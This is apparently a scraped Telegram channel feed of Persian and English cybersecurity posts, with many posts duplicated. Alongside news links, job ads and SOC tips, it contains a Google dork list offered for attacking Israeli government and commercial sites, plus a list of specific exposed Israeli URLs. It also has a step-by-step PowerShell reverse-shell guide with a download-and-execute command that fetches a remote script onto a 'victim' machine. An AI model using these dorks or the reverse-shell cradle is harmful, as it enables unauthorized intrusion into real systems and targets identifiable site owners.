درسته کهMISP نسبت بهYETI برتر هست ولی اگر میخواید در YETI دست به آچار بشید مقاله زیر خوبه
** پلتفرم رایگان Threat intelligence
https://readmedium.com/build-your-own-cyber-threat-intel-feeds-at-home-yeti-e13b3edf9f39
@Engineer_Computer
** پلتفرم رایگان Threat intelligence
https://readmedium.com/build-your-own-cyber-threat-intel-feeds-at-home-yeti-e13b3edf9f39
@Engineer_Computer
Readmedium
Your Everyday Threat Intel: Build A Threat Hunting Platform at Home!
Learn how to Collect Open Source Threat Intelligence
#استخدام #تهران
سلام به دوستان و همکاران محترم یک سازمان دولتی جهت تکمیل نیروی فنی واحد مانیتورینگ شبکه به دو متخصص با دانش فنی در موارد زیر نیاز دارد :
Zabbix
Lpic-1
آشنایی با grafana و splunk و ccna مزیت محسوب میشود
لطفا اطلاعات و رزومه خود را به تلگرام @omidfr ارسال
بفرمایید
یا با شماره 09122036944 تماس بگیرید
@Engineer_Computer
سلام به دوستان و همکاران محترم یک سازمان دولتی جهت تکمیل نیروی فنی واحد مانیتورینگ شبکه به دو متخصص با دانش فنی در موارد زیر نیاز دارد :
Zabbix
Lpic-1
آشنایی با grafana و splunk و ccna مزیت محسوب میشود
لطفا اطلاعات و رزومه خود را به تلگرام @omidfr ارسال
بفرمایید
یا با شماره 09122036944 تماس بگیرید
@Engineer_Computer
Extract and execute a PE embedded within a PNG file using an LNK file
https://github.com/Maldev-Academy/ExecutePeFromPngViaLNK
@Engineer_Computer
https://github.com/Maldev-Academy/ExecutePeFromPngViaLNK
@Engineer_Computer
GitHub
GitHub - Maldev-Academy/ExecutePeFromPngViaLNK: Extract and execute a PE embedded within a PNG file using an LNK file.
Extract and execute a PE embedded within a PNG file using an LNK file. - Maldev-Academy/ExecutePeFromPngViaLNK
شناسایی سرور های c2 با shodan
https://readmedium.com/c2-hunting-how-to-find-c2-servers-with-shodan-c23f48ac39a4
@Engineer_Computer
https://readmedium.com/c2-hunting-how-to-find-c2-servers-with-shodan-c23f48ac39a4
@Engineer_Computer
Readmedium
C2 Hunting: How to Find C2 Servers with Shodan
C2 hunting empowers you to track down adversary C2 servers and stay a step ahead bad guys. This guide teaches you how to do it using…
گوگل دورک هایی برای حمله به زیر ساخت های سگیونیستی و تولید صابون:
میتونین خودتون تغیراتی ایجاد کنید👍
site:*.gov.il ext:php
site:*.il "admin"
site:*.il "dashboard"
site:*.il inurl:?id=
site:*.il inurl:?cat=
site:*.il ext:zip
site:*.il inurl:aspx?
site:*.il inurl:?id=
site:*.il inurl:"index.php?id=" OR inurl:"news.php?id=" OR inurl:"gallery.php?id=" OR inurl:"product.php?id=" OR inurl:"post.php?id=" OR inurl:"static"
site:*.il inurl:news.php?id=
site:*.il "index of /"
@Engineer_Computer
میتونین خودتون تغیراتی ایجاد کنید👍
site:*.gov.il ext:php
site:*.il "admin"
site:*.il "dashboard"
site:*.il inurl:?id=
site:*.il inurl:?cat=
site:*.il ext:zip
site:*.il inurl:aspx?
site:*.il inurl:?id=
site:*.il inurl:"index.php?id=" OR inurl:"news.php?id=" OR inurl:"gallery.php?id=" OR inurl:"product.php?id=" OR inurl:"post.php?id=" OR inurl:"static"
site:*.il inurl:news.php?id=
site:*.il "index of /"
@Engineer_Computer
👍1
https://tzafrir.org.il/~tzafrir/git_test/.git/
https://apache.co.il/zzz/
https://www.flutedoc.co.il/
https://pdf.melumad.co.il/
https://flashner.co.il/~efraim/
https://git.shore.co.il/nimrod/igentify/-/tree/02fa7300160b70c93bc230419f0a49b150e2fe5f
https://asidesign.co.il/wp-content/uploads/
https://tuticafe.co.il/wp-content/uploads/
با یدونه از گوگل دورک های بالا ریختن بیرون
@Engineer_Computer
https://apache.co.il/zzz/
https://www.flutedoc.co.il/
https://pdf.melumad.co.il/
https://flashner.co.il/~efraim/
https://git.shore.co.il/nimrod/igentify/-/tree/02fa7300160b70c93bc230419f0a49b150e2fe5f
https://asidesign.co.il/wp-content/uploads/
https://tuticafe.co.il/wp-content/uploads/
با یدونه از گوگل دورک های بالا ریختن بیرون
@Engineer_Computer
با این کد پاورشل میتونید Reverse shell از سیستم های ویندوزی بگیرید:
https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1
کافیه این ماژول داخل پاورشل قربانی وارد بشه تا دسترسی شما از کامپیوتر طرف برقرار بشه.
مراحل اجرا:
1. بجای IP,PORT داخل کد, آدرس و پورت سرور خودتون رو قرار بدید.
2. حالا با استفاده از یک پیلود مثل
iex((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1'))
میتونید ماژول رو از سرور دریافت و در سیستم قربانی اجرا کنید.
دسترسی برقرار میشود!💣
نکته: این پست ها صرفا جهت استفاده در موارد آموزشی میباشد👍
@Engineer_Computer
https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1
کافیه این ماژول داخل پاورشل قربانی وارد بشه تا دسترسی شما از کامپیوتر طرف برقرار بشه.
مراحل اجرا:
1. بجای IP,PORT داخل کد, آدرس و پورت سرور خودتون رو قرار بدید.
2. حالا با استفاده از یک پیلود مثل
iex((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1'))
میتونید ماژول رو از سرور دریافت و در سیستم قربانی اجرا کنید.
دسترسی برقرار میشود!💣
نکته: این پست ها صرفا جهت استفاده در موارد آموزشی میباشد👍
@Engineer_Computer
نکته ی هفته :
کنترل ها ( کاهنده های ریسک) از دسته های زیر هستند :
۱-جلوگیری کننده : preventive
مثال: فایروال ، طراحی زیرو تراست ، گذاشتن نگهبان دم درب
۲-کشف کننده detective
مثال: IDS ؛ خود SOC ؛ تاحدودی معماری زیرو تراست و هانت
۳-مدیریتی Administrative
مثال: خط مشی ؛ فرآیند و ساختار سازمان
لذا شما فقط نباید به
۱-چند لایه کردن فایروال نگاه کنید .
بلکه باید به این نگاه کنید
۲- آیا توان کشف هم دارید ؟
۳-آیا ساختار سازمانی شما اجازه میدهد به موقع لزوم، تمدید لایسنس را انجام دهید ؟
هر سه مورد فوق از کنترل های امنیت و کاهنده های ریسک هستند در زمره جلوگیری کننده ، کشف کننده و مدیریتی
@Engineer_Computer
کنترل ها ( کاهنده های ریسک) از دسته های زیر هستند :
۱-جلوگیری کننده : preventive
مثال: فایروال ، طراحی زیرو تراست ، گذاشتن نگهبان دم درب
۲-کشف کننده detective
مثال: IDS ؛ خود SOC ؛ تاحدودی معماری زیرو تراست و هانت
۳-مدیریتی Administrative
مثال: خط مشی ؛ فرآیند و ساختار سازمان
لذا شما فقط نباید به
۱-چند لایه کردن فایروال نگاه کنید .
بلکه باید به این نگاه کنید
۲- آیا توان کشف هم دارید ؟
۳-آیا ساختار سازمانی شما اجازه میدهد به موقع لزوم، تمدید لایسنس را انجام دهید ؟
هر سه مورد فوق از کنترل های امنیت و کاهنده های ریسک هستند در زمره جلوگیری کننده ، کشف کننده و مدیریتی
@Engineer_Computer
گستره آلوده شدن توسط نرم افزار جاسوسی پگاسوس بزرگتر شد
هدف قرار گرفته شدن افراد برای جاسوسی
درمورد پگاسوس قبلا در کانال مطلب گذاشته ایم که اختصاصا برای جاسوسی از افراد طراحی شده است.
https://cybersecuritynews-com.cdn.ampproject.org/c/s/cybersecuritynews.com/pegasus-spyware-detected-in-new-mobile-devices/amp/
@Engineer_Computer
هدف قرار گرفته شدن افراد برای جاسوسی
درمورد پگاسوس قبلا در کانال مطلب گذاشته ایم که اختصاصا برای جاسوسی از افراد طراحی شده است.
https://cybersecuritynews-com.cdn.ampproject.org/c/s/cybersecuritynews.com/pegasus-spyware-detected-in-new-mobile-devices/amp/
@Engineer_Computer
Cyber Security News
Isreali NSO Group's Pegasus Spyware Detected in New Mobile Devices
Pegasus spyware, developed by NSO Group, shows that spyware targets not only activists and journalists but also professionals and civilians
کال بک هایی در سیستم عامل که بدافزار نویسان و امنیت چی ها دنبال آن هستند
https://codemachine.com/articles/kernel_callback_functions.html
@Engineer_Computer
https://codemachine.com/articles/kernel_callback_functions.html
@Engineer_Computer
Codemachine
CodeMachine - Article - Kernel Callback Functions
Comprehensive list of documented and undocumented APIs available in the Windows kernel to register callback routines.
Discover how Zero-Trust Network Access (ZTNA) strengthens cybersecurity, reduces costs, and streamlines remote access.
Explore best practices for seamlessly integrating ZTNA into your existing security systems.
Read:
https://thehackernews.com/expert-insights/2024/08/best-practices-for-integrating-ztna.html
Gartner's latest CTEM report highlights Adversarial Exposure Validation (AEV) as vital for cybersecurity, combining breach simulation with pentesting to streamline security assessments, automate testing, and enhance resilience.
Learn more:
https://thehackernews.com/2024/08/ctem-in-spotlight-how-gartners-new.html
@Engineer_Computer
Explore best practices for seamlessly integrating ZTNA into your existing security systems.
Read:
https://thehackernews.com/expert-insights/2024/08/best-practices-for-integrating-ztna.html
Gartner's latest CTEM report highlights Adversarial Exposure Validation (AEV) as vital for cybersecurity, combining breach simulation with pentesting to streamline security assessments, automate testing, and enhance resilience.
Learn more:
https://thehackernews.com/2024/08/ctem-in-spotlight-how-gartners-new.html
@Engineer_Computer
🔒 U.S. agencies have identified an Iranian hacking group, Pioneer Kitten, as the force behind a wave of ransomware attacks.
Key sectors like education, healthcare, and defense are under fire, with sensitive data hanging in the balance.
Read:
https://thehackernews.com/2024/08/us-agencies-warn-of-iranian-hacking.html
Discover how Identity Threat Detection & Response (ITDR) solutions safeguard both human and non-human identities across across multi-environment cloud services, enhancing security against sophisticated identity-based attacks.
Read Guide:
https://thehackernews.com/2024/08/identity-threat-detection-and-response.html
@Engineer_Computer
Key sectors like education, healthcare, and defense are under fire, with sensitive data hanging in the balance.
Read:
https://thehackernews.com/2024/08/us-agencies-warn-of-iranian-hacking.html
Discover how Identity Threat Detection & Response (ITDR) solutions safeguard both human and non-human identities across across multi-environment cloud services, enhancing security against sophisticated identity-based attacks.
Read Guide:
https://thehackernews.com/2024/08/identity-threat-detection-and-response.html
@Engineer_Computer
WebApp Security
Government Emails at Risk:
Critical Cross-Site Scripting Vulnerability in Roundcube Webmail
https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail
A critical security flaw in Atlassian Confluence has been exploited for cryptocurrency mining. This vulnerability, CVE-2023-22527, allows unauthorized access, leading to potential severe financial and operational damage.
Read:
https://thehackernews.com/2024/08/atlassian-confluence-vulnerability.html
Confluence Vulnerabilty Exploited for Crypto Miners
https://www.trendmicro.com/en_us/research/24/h/cve-2023-22527-cryptomining.html
@Engineer_Computer
Government Emails at Risk:
Critical Cross-Site Scripting Vulnerability in Roundcube Webmail
https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail
A critical security flaw in Atlassian Confluence has been exploited for cryptocurrency mining. This vulnerability, CVE-2023-22527, allows unauthorized access, leading to potential severe financial and operational damage.
Read:
https://thehackernews.com/2024/08/atlassian-confluence-vulnerability.html
Confluence Vulnerabilty Exploited for Crypto Miners
https://www.trendmicro.com/en_us/research/24/h/cve-2023-22527-cryptomining.html
@Engineer_Computer
Sonarsource
Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail
Sonar’s R&D team discovered a Cross-Site Scripting vulnerability in Roundcube. Similar vulnerabilities in Roundcube have been used by APTs to steal government emails.
SOC Analyst Tier1 Interview Form.pdf
212.8 KB
نمونه فرم مصاحبه کارشناس مرکز عملیات امنیت SOC T1
@Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
لینک مقاله را در readmedium بگذارید
https://readmedium.com/threat-modeling-and-risk-assessment-with-example-3d8bc6177e8d
@Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
Readmedium
Threat modeling and Risk Assessment with example
1. Threat Modeling:
چند نوع حمله
2024-12-05 10:12:34 - User Logon - User: student1 - Source IP: 192.168.1.5 - Workstation: WORKSTATION01
2024-12-05 10:15:12 - Kerberos Service Ticket Request - User: attacker01 - Service: HTTP/[email protected]
2024-12-05 10:15:18 - Security Warning - Suspicious ticket request detected for user attacker01 from IP 192.168.1.101.
2024-12-05 10:20:45 - Service Account Enumeration - Host: DC01 - User: attacker01 - Process: Mimikatz.exe
2024-12-05 10:23:30 - Privilege Escalation - User: attacker01 - Action: SeImpersonatePrivilege enabled.
2024-12-05 10:25:11 - Lateral Movement Detected - Source IP: 192.168.1.101 - Destination: 192.168.1.12 - Protocol: SMB
2024-12-05 10:30:00 - Pass-the-Hash - NTLM Authentication - Source: 192.168.1.12 - Account: admin01 - Hash Used: abcd1234abcd1234abcd1234abcd1234
2024-12-05 10:35:22 - Directory Replication Attempt - User: attacker01 - Command: DCSync - Target: DC01
2024-12-05 10:35:50 - Security Alert - Unauthorized replication detected! Account: attacker01.
2024-12-05 10:40:00 - Malware Executed - Process: lsass.exe - Host: 192.168.1.12 - User: attacker01 - Code Injection Detected
2024-12-05 10:45:13 - DCShadow Attack - New Schema Update Initiated by attacker01.
2024-12-05 10:50:00 - Security Alert - Unauthorized attribute modification - Target: DC01 - Attributes: msDS-AllowedToActOnBehalfOfOtherIdentity
@Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
https://securityonline.info/poc-exploit-releases-for-critical-zabbix-vulnerability-cve-2024-42327/
@Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
Daily CyberSecurity
PoC Exploit Releases for Critical Zabbix Vulnerability - CVE-2024-42327 (CVSS 9.9)
Security researcher Alejandro Ramos has published a detailed technical analysis and proof-of-concept (PoC) exploit code for CVE-2024-42327
JShunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. This tool specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for developers and security researchers.
#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #bugbountyTools
Please open Telegram to view this post
VIEW IN TELEGRAM
THE BEST SOC ANALYST TOOLS.pdf
3.4 MB
ابزار های مهم برای SOC
#infosec #cybersecurity #SOC #pentest #SOCTools
Please open Telegram to view this post
VIEW IN TELEGRAM
🎉1
State of Physical Security 2025.pdf
8.9 MB
Strategizing, planning, and investing wisely
The integration of artificial intelligence (AI) into physical security systems is promising development and one end users are eager to explore (10% did in 2024 and 37% plan to in 2025)
Analytics and Al techniques will continue to usher in new possibilities, allowing businesses to capitalize on existing physical security data, infrastructure, and sensors to automate mundane tasks and drive higher levels of operational efficiency company-wide.
#infosec #cybersecurity #SOC #pentest #SOCTools
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1